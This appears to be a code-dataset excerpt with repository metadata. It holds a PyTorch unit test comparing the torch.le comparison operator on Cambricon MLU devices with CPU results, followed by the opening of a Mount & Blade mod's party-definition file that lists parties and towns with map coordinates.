| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
62e9f95aca72c9083383a82f0fa3775ad3a8a98d
| 11,285
|
py
|
Python
|
test/cnnl/op_test/test_le.py
|
Cambricon/catch
|
2625da389f25a67066d20fb6b0c38250ef98f8ab
|
[
"BSD-2-Clause"
] | 20
|
2022-03-01T11:40:51.000Z
|
2022-03-30T08:17:47.000Z
|
test/cnnl/op_test/test_le.py
|
Cambricon/catch
|
2625da389f25a67066d20fb6b0c38250ef98f8ab
|
[
"BSD-2-Clause"
] | null | null | null |
test/cnnl/op_test/test_le.py
|
Cambricon/catch
|
2625da389f25a67066d20fb6b0c38250ef98f8ab
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import print_function
import sys
import os
os.environ['ENABLE_CNNL_TRYCATCH']='OFF' # pylint: disable=C0413
import unittest
import logging
import torch
import torch_mlu.core.mlu_model as ct
cur_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(cur_dir + "/../../")
from common_utils import testinfo, TestCase # pylint: disable=C0411, C0413
logging.basicConfig(level=logging.DEBUG)
class TestLeOp(TestCase):
# @unittest.skip("not test")
@testinfo()
def test_le(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape1, shape2 in [((), ()), ((), (1)),
((), (256, 144, 7, 15, 2, 1)),
((1), (256, 7)),
((5), (5)),
((2, 3, 4), (3, 4)),
((1, 117, 1, 4, 1, 5, 1, 2), (117, 1, 5, 1, 5, 1, 3, 1)),
((1), (256, 144, 7, 15, 2, 1, 1, 1))]:
x = torch.randn(shape1).to(t)
y = torch.randn(shape2).to(t)
out_cpu = torch.le(x, y)
out_mlu = torch.le(self.to_mlu(x), self.to_mlu(y))
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
out_cpu = x <= y
out_mlu = self.to_mlu(x) <= self.to_mlu(y)
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_not_dense(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape1, shape2 in [((12, 15, 18, 26), (12, 15, 18, 50)),
((1), (20, 144, 8, 30))]:
x = torch.randn(shape1).to(t)
y = torch.randn(shape2).to(t)
out_cpu = torch.le(x, y[:,:,:,10:36])
y_mlu = self.to_mlu(y)
out_mlu = torch.le(self.to_mlu(x), y_mlu[:,:,:,10:36])
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
out_cpu = x <= y[:,:,:,10:36]
out_mlu = self.to_mlu(x) <= y_mlu[:,:,:,10:36]
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_channel_last(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape1 in [(12, 15, 18, 26),
(20, 144, 8, 30)]:
x = torch.randn(shape1).to(t)
y = torch.randn(shape1).to(t)
x_cl = self.convert_to_channel_last(x)
y_cl = self.convert_to_channel_last(y)
out_cpu = torch.le(x_cl, y_cl)
x_mlu_cl = self.convert_to_channel_last(self.to_mlu(x))
y_mlu_cl = self.convert_to_channel_last(self.to_mlu(y))
out_mlu = torch.le(x_mlu_cl, y_mlu_cl)
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
out_cpu = x_cl <= y_cl
out_mlu = x_mlu_cl <= y_mlu_cl
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
# mixed memory format
z = torch.randn(shape1).to(t)
out_cpu = torch.le(x, z)
out_mlu = torch.le(self.to_mlu(x), self.to_mlu(z))
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
out_cpu = x <= z
out_mlu = self.to_mlu(x) <= self.to_mlu(z)
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_inplace(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape1, shape2 in [((), ()), ((), (1)),
((), (256, 144, 7, 15, 2, 1)),
((1), (256, 7)),
((5), (5)),
((1, 117, 1, 4, 1, 1, 1, 1), (117, 117, 5, 4, 5, 1, 3, 1)),
((1), (256, 144, 7, 15, 2, 1, 1, 1))]:
x = torch.randn(shape1).to(t)
y = torch.randn(shape2).to(t)
x_mlu = x.to("mlu")
y_mlu = y.to("mlu")
y_mlu_data = y_mlu.data_ptr()
y.le_(x)
y_mlu.le_(x_mlu)
self.assertEqual(y_mlu_data, y_mlu.data_ptr())
self.assertTensorsEqual(y.float(), y_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_inplace_channel_last(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.long, torch.half, torch.uint8
]
for t in type_list:
for shape1, shape2 in [((5, 3, 4, 1), (1, 3, 4, 1))]:
# both channel last
x = torch.randn(shape2).to(t).to(memory_format=torch.channels_last)
y = torch.randn(shape1).to(t).to(memory_format=torch.channels_last)
x_mlu = x.to("mlu")
y_mlu = y.to("mlu")
y.le_(x)
y_mlu_data = y_mlu.data_ptr()
y_mlu.le_(x_mlu)
self.assertEqual(y_mlu_data, y_mlu.data_ptr())
self.assertTensorsEqual(y.float(), y_mlu.cpu().float(), 0.0, use_MSE=True)
# mixed memory format
z = torch.randn(shape1).to(t)
z_mlu = z.to("mlu")
z.le_(x)
z_mlu_data = z_mlu.data_ptr()
z_mlu.le_(x_mlu)
self.assertEqual(z_mlu_data, z_mlu.data_ptr())
self.assertTensorsEqual(z.float(), z_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_inplace_not_dense(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.long, torch.half, torch.uint8
]
for t in type_list:
for shape1, shape2 in [((3, 4), (2, 3, 4))]:
x = torch.randn(shape1).to(t)
y = torch.randn(shape2).to(t)
x_mlu = x.to("mlu")
y_mlu = y.to("mlu")
y[:, :, :2].le_(x[:, :2])
y_mlu_data = y_mlu.data_ptr()
y_mlu[:, :, :2].le_(x_mlu[:, :2])
self.assertEqual(y_mlu_data, y_mlu.data_ptr())
self.assertTensorsEqual(y.float(), y_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_out(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape1, shape2 in [((), ()), ((), (1)),
((), (256, 144, 7, 15, 2, 1)),
((1), (256, 7)),
((5), (5)),
((2, 3, 4), (3, 4)),
((1, 117, 1, 4, 1, 1, 1, 1), (117, 117, 5, 4, 5, 1, 3, 1)),
((256, 144, 7, 15, 2, 1, 1, 1), (1)),
((1), (256, 144, 7, 15, 2, 1, 1, 1))]:
x = torch.randn(shape1).to(t)
y = torch.randn(shape2).to(t)
out_tmpcpu = torch.zeros(shape2, dtype=torch.bool)
out_tmpmlu = torch.zeros(shape2, dtype=torch.bool).to("mlu")
torch.le(x, y, out=out_tmpcpu)
torch.le(self.to_mlu(x), self.to_mlu(y), out=out_tmpmlu)
self.assertTensorsEqual(
out_tmpcpu.float(), out_tmpmlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_scalar(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape in [(), (256, 144, 7, 15, 2, 1), (1), (256, 7),
(2, 3, 4), (117, 1, 5, 1, 5, 1, 3, 1),
(256, 144, 7, 15, 2, 1, 1, 1)]:
x = torch.randn(shape).to(t)
y = torch.randn(()).to(t).item()
out_cpu = torch.le(x, y)
out_mlu = torch.le(self.to_mlu(x), y)
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
out_cpu = x <= y
out_mlu = self.to_mlu(x) <= y
self.assertTensorsEqual(out_cpu.float(), out_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_inplace_scalar(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape in [(), (256, 144, 7, 15, 2, 1), (1,), (256, 7),
(2, 3, 4), (117, 1, 5, 1, 5, 1, 3, 1),
(256, 144, 7, 15, 2, 1, 1, 1)]:
x = torch.randn(shape).to(t)
y = torch.randn(()).to(t).item()
x_mlu = x.to('mlu')
x_mlu_data = x_mlu.data_ptr()
x.le_(y)
x_mlu.le_(y)
self.assertEqual(x_mlu_data, x_mlu.data_ptr())
self.assertTensorsEqual(x.float(), x_mlu.cpu().float(), 0.0, use_MSE=True)
# @unittest.skip("not test")
@testinfo()
def test_le_out_scalar(self):
type_list = [
torch.bool, torch.float, torch.int, torch.short, torch.int8,
torch.uint8, torch.long, torch.half
]
for t in type_list:
for shape in [(), (256, 144, 7, 15, 2, 1), (1), (256, 7),
(2, 3, 4), (117, 1, 5, 1, 5, 1, 3, 1),
(256, 144, 7, 15, 2, 1, 1, 1)]:
x = torch.randn(shape).to(t)
y = torch.randn(()).to(t).item()
out_tmpcpu = torch.zeros(shape, dtype=torch.bool)
out_tmpmlu = torch.zeros(shape, dtype=torch.bool).to('mlu')
torch.le(x, y, out=out_tmpcpu)
torch.le(self.to_mlu(x), y, out=out_tmpmlu)
self.assertTensorsEqual(
out_tmpcpu.float(), out_tmpmlu.cpu().float(), 0.0, use_MSE=True)
if __name__ == '__main__':
unittest.main()
| 43.571429
| 98
| 0.472574
| 1,516
| 11,285
| 3.341689
| 0.076517
| 0.012238
| 0.031978
| 0.033557
| 0.899131
| 0.877813
| 0.848993
| 0.817015
| 0.787011
| 0.777537
| 0
| 0.068256
| 0.371644
| 11,285
| 258
| 99
| 43.74031
| 0.646171
| 0.033496
| 0
| 0.605381
| 0
| 0
| 0.006244
| 0
| 0
| 0
| 0
| 0
| 0.098655
| 1
| 0.044843
| false
| 0
| 0.035874
| 0
| 0.085202
| 0.004484
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1a26cacf37bcd7384e0c6709554f3374e9a3e21e
| 247,892
|
py
|
Python
|
src/module_parties.py
|
faycalki/tainted-paths
|
81cecf6c1fba903ec3b8043e22652d222892609d
|
[
"MIT"
] | 4
|
2019-09-26T21:34:32.000Z
|
2021-11-18T19:31:15.000Z
|
src/module_parties.py
|
faycalki/tainted-paths
|
81cecf6c1fba903ec3b8043e22652d222892609d
|
[
"MIT"
] | null | null | null |
src/module_parties.py
|
faycalki/tainted-paths
|
81cecf6c1fba903ec3b8043e22652d222892609d
|
[
"MIT"
] | null | null | null |
from header_common import *
from header_parties import *
from ID_troops import *
from ID_factions import *
from ID_party_templates import *
from ID_map_icons import *
####################################################################################################################
# Each party record contains the following fields:
# 1) Party id: used for referencing parties in other files.
# The prefix p_ is automatically added before each party id.
# 2) Party name.
# 3) Party flags. See header_parties.py for a list of available flags
# 4) Menu. ID of the menu to use when this party is met. The value 0 uses the default party encounter system.
# 5) Party-template. ID of the party template this party belongs to. Use pt_none as the default value.
# 6) Faction.
# 7) Personality. See header_parties.py for an explanation of personality flags.
# 8) Ai-behavior
# 9) Ai-target party
# 10) Initial coordinates.
# 11) List of stacks. Each stack record is a triple that contains the following fields:
# 11.1) Troop-id.
# 11.2) Number of troops in this stack.
# 11.3) Member flags. Use pmf_is_prisoner to note that this member is a prisoner.
# 12) Party direction in degrees [optional]
####################################################################################################################
no_menu = 0
parties = [
("main_party", "Player Army", icon_player_horseman|pf_limit_members, no_menu, pt_none, fac_player_faction, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [(trp_player, 1, 0)]),
("temp_party", "None", icon_player|pf_disabled, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("camp_bandits", "{!}camp bandits", icon_player|pf_disabled, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [(trp_temp_troop, 3, 0)]),
("exparty_backup", "{!}", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_party_2", "{!}temp party 2", icon_player|pf_disabled, no_menu, pt_none, fac_commoners, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_casualties", "{!}casualties", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_casualties_2", "{!}casualties", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_casualties_3", "{!}casualties", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_wounded", "{!}enemies wounded", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("temp_killed", "{!}enemies killed", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("main_party_backup", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("encountered_party_backup", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_friends_backup", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("player_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("enemy_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ally_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_enemy", "{!}collective enemy", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_ally", "{!}collective ally", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("collective_friends", "{!}collective ally", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("total_enemy_casualties", "{!} ", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("routed_enemies", "{!}routed enemies", icon_player|pf_disabled, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("zendar", "none", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("town_1", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("castle_1", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("village_1", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("salt_mine", "nnn", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("four_ways_inn", "nnn (inn)", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("test_scene", "test scene", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("battlefields", "battlefields", icon_point_mark|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("dhorak_keep", "Dhorak Keep", icon_point_mark|pf_disabled|pf_no_label|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("training_ground", "Training ground", icon_cantsee|pf_disabled|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("training_ground_1", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_2", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_3", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_4", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("training_ground_5", "Training ground", icon_cantsee|pf_disabled|pf_label_large|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), [], 100.0),
("pyongyang", "Pyongyang", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1144.42, -170.76), [], 170.0),
("hanseong", "Hanseong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1158.0, -152.04), []),
("hoeryong", "Hoeryong", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1186.4, -212.0), [], 125.0),
("hamhung", "Hamhung", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.2, -185.2), [], 45.0),
("jeonju", "Jeonju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1157.76, -130.56), [], 245.0),
("gaesung", "Gaesung", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1152.76, -158.24), [], 175.0),
("chungju", "Chungju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1167.8, -144.6), [], 260.0),
("jinju", "Jinju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1170.32, -121.64), [], 95.0),
("sangju", "Sangju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1170.88, -137.04), [], 55.0),
("gilju", "Gilju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1179.2, -194.0), [], 65.0),
("uiju", "Uiju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1132.4, -182.0), [], 125.0),
("gangleung", "Gangleung", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1178.64, -152.8), [], 75.0),
("busan", "Busan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1181.04, -123.44), [], 280.0),
("jeju", "Jeju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1152.8, -101.76), [], 100.0),
("hyesan", "Hyesan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1171.16, -199.42), [], 110.0),
("gongju", "Gongju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1160.12, -138.52), [], 120.0),
("haeju", "Haeju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1145.48, -156.14), [], 130.0),
("naju", "Naju", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1154.92, -120.56), [], 170.0),
("cheongjin", "Cheongjin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1187.8, -205.36), [], 170.0),
("wonsan", "Wonsan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1162.6, -171.08), [], 260.0),
("sokcho", "Sokcho", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1175.0, -159.08), [], 45.0),
("myohyangsan", "Myohyangsan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1153.8, -183.28), [], 125.0),
("nampo", "Nampo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1139.98, -166.6), []),
("chuncheon", "Chuncheon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.84, -155.6), [], 270.0),
("ganggae", "Ganggae", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1153.28, -194.08), [], 110.0),
("ulsan", "Ulsan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1182.8, -127.2), [], 240.0),
("athens", "Athens", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-29.68, -156.4), [], 260.0),
("sparta", "Sparta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-16.52, -145.2), [], 180.0),
("pella", "Pella", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-6.68, -202.76), [], 110.0),
("crete", "Crete", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-43.6, -122.0), [], 180.0),
("dalmatia", "Dalmatia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (39.2, -224.8), [], 160.0),
("philippopolis", "Philippopolis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-41.2, -209.96), [], 240.0),
("buthrotum", "Buthrotum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (12.48, -183.64), [], 15.0),
("patra", "Patra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-8.46, -159.28), []),
("larissa", "Larissa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-16.24, -178.8), [], 15.0),
("sarajevo", "Sarajevo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (28.16, -232.36), [], 180.0),
("trikala", "Trikala", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-8.0, -177.6), [], 45.0),
("corinth", "Corinth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-22.28, -152.16), [], 240.0),
("thessalonica", "Thessalonica", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-21.16, -190.56), [], 240.0),
("khania", "Khania", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.4, -125.6), [], 90.0),
("sardika", "Sardika", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-25.44, -217.32), [], 155.0),
("darryhachium", "Darryhachium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (16.16, -195.64), [], 45.0),
("arta", "Arta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-0.76, -172.56), [], 180.0),
("carthage", "Carthage", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (118.88, -142.56), [], 25.0),
("gabes", "Gabes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (122.2, -109.68), [], 75.0),
("bejaia", "Bejaia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (174.96, -140.48), [], 90.0),
("syracuse", "Syracuse", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (63.86, -146.1), [], 120.0),
("hadrumetum", "Hadrumetum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (113.72, -129.76), [], 255.0),
("tarabulus", "Tarabulus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (85.52, -94.52), [], 270.0),
("palermo", "Palermo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (84.0, -157.04), [], 35.0),
("annaba", "Annaba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (145.2, -141.8), [], 10.0),
("lilybaeum", "Lilybaeum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (91.76, -153.8), [], 90.0),
("gaspar", "Gaspar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (133.24, -114.04), [], 80.0),
("sirte", "Sirte", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.72, -75.8), [], 180.0),
("constantine", "Constantine", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (157.44, -137.08), [], 240.0),
("laghouat", "Laghouat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (197.84, -106.4), [], 155.0),
("tebessa", "Tebessa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (140.8, -125.48), [], 275.0),
("agra", "Agra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-618.36, -36.76), [], 175.0),
("karachi", "Karachi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-502.8, -7.2), [], 30.0),
("indore", "Indore", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-599.08, 15.96), [], 35.0),
("satna", "Satna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-653.12, -4.24), [], 115.0),
("multan", "Multan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-547.0, -65.68), [], 245.0),
("nagpur", "Nagpur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-634.0, 33.2), [], 120.0),
("allahabad", "Allahabad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-666.4, -13.94), [], 130.0),
("kota", "Kota", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-598.88, -10.2), [], 180.0),
("jaipur", "Jaipur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-597.96, -28.52), [], 180.0),
("bikaner", "Bikaner", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-571.12, -41.48), [], 185.0),
